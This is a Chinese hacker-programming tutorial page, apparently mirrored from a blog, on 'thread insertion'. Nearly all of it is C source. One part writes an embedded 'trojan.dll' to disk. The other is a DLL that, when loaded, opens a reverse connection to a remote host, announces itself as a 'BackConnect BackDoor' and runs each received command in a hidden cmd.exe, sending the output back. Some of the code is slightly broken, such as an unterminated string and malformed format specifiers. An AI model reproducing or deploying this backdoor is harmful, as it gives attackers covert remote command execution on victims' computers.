zoukankan      html  css  js  c++  java
  • 黑客编程教程(十六)线程插入技术

    //  resource.h
    
    #define RC_BINARYTYPE 256
    
    #define ID_MAGICDEL_DLL 100
    
     
    
    DLL文件:
    
     
    
    #include <windows.h>
    
    #include<stdio.h>
    
    #include "resource.h"
    
     
    
    void WriteResourceToFile(char const *filename)
    
    {
    
     
    
    HINSTANCE hInstance=GetModuleHandle(NULL);
    
        
    
        HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
    
                                      MAKEINTRESOURCE(RC_BINARYTYPE));
    
        HGLOBAL hgRes = LoadResource(hInstance, hResInfo);
    
        void *pvRes = LockResource(hgRes);
    
        DWORD cbRes = SizeofResource(hInstance, hResInfo);
    
     
    
        
    
        HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
    
                                  FILE_ATTRIBUTE_NORMAL, 0);
    
        DWORD cbWritten;
    
        WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);
    
        CloseHandle(hFile);
    
    }
    
     
    
     
    
    int main(void)
    
    {
    
        WriteResourceToFile("trojan.dll");
    
    return 0;
    
    }
    
     
    
    主程序:
    
     
    
    #include<winsock2.h>
    
    #include<stdio.h>
    
    #pragma comment(lib,"ws2_32.lib")
    
    #pragma comment(lib, "kernel32.lib")
    
    int StartSocket(); //连接函数
    
    BOOL APIENTRY DllMain( HANDLE hModule, 
    
                           DWORD  ul_reason_for_call, 
    
                           LPVOID lpReserved
    
    )   //动态连接库的入口,相当于main()函数
    
    {
    
    switch(ul_reason_for_call)
    
        {
    
          case DLL_PROCESS_ATTACH: 
    
           {
    
               DWORD id;           CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id);
    
               break;
    
           }
    
          default:
    
      break;
    
        }
    
      return TRUE;
    
    }
    
    int StartSocket()
    
    {
    
    char *messages = "
    ======================== BackConnect BackDoor V0.1 ========================
    ========= Welcome to Http://www.hackerxfiles.net =========
    "; 
    
    WSADATA WSAData;
    
    SOCKET sock;
    
    SOCKADDR_IN addr_in;
    
    char buf1[1024];   //作为socket接收数据的缓冲区
    
    memset(buf1,0,1024);   //清空缓冲区
    
     if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    
       {
    
         printf("WSAStartup error.Error:d
    ",WSAGetLastError());
    
         return;
    
       }
    
     
    
       addr_in.sin_family=AF_INET;
    
       addr_in.sin_port=htons(80);  //反向连接的远端主机端口
    
       addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  //远端IP
    
          if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    
       {
    
         printf("Socket failed.Error:d
    ",WSAGetLastError());
    
         return;
    
       }
    
       if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)     //连接客户主机
    
       {
    
         printf("Connect failed.Error:d",WSAGetLastError());
    
         return;
    
       }
    
          if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)  //发送欢迎信息
    
       {
    
            printf("Send failed.Error:d
    ",WSAGetLastError());
    
            return;
    
       }
    
       
    
    char buffer[2048] = {0};//管道输出的数据
    
    for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
    
    SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
    
    HANDLE hRead,hWrite;
    
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    
    sa.lpSecurityDescriptor = NULL;
    
    sa.bInheritHandle = TRUE;
    
    if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
    
    {
    
      printf("Error On CreatePipe()");
    
         return;
    
    } 
    
     
    
    STARTUPINFO si;
    
    PROCESS_INFORMATION pi; 
    
    si.cb = sizeof(STARTUPINFO);
    
    GetStartupInfo(&si); 
    
    si.hStdError = hWrite;
    
    si.hStdOutput = hWrite;
    
    si.wShowWindow = SW_HIDE;
    
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    
     
    
    GetSystemDirectory(cmdline,MAX_PATH+1);
    
    strcat(cmdline,"\cmd.exe /c");
    
     
    
    int   len=recv(sock,buf1,1024,NULL);
    
    if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序
    
    if(len<=1){send(sock,"error
    ",sizeof("error
    "),0);continue;}
    
     
    
    strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
    
    if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) 
    
    {
    
     send(sock,"Error command
    ",sizeof("Error command
    "),0);
    
     continue;
    
    }
    
      
    
    CloseHandle(hWrite);
    
    //循环读取管道中数据并发送,直到管道中没有数据为止
    
    for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){  
    
    send(sock,buffer,strlen(buffer),0);
    
    }
    
         }
    
    return 0;
    
    }
  • 相关阅读:
    递归-计算排列组合问题
    递归-字符串翻转
    递归-求字符串的子序列
    递归
    递归
    PHP开发工程师-技能树
    Graph-BFS-Fly-图的广度优先遍历-最小转机问题
    Graph-DFS-Map-图的深度优先遍历-城市地图问题
    Graph-BFS-图的广度优先遍历
    Graph-DFS-图的深度优先遍历
  • 原文地址:https://www.cnblogs.com/rinack/p/3195671.html
Copyright © 2011-2022 走看看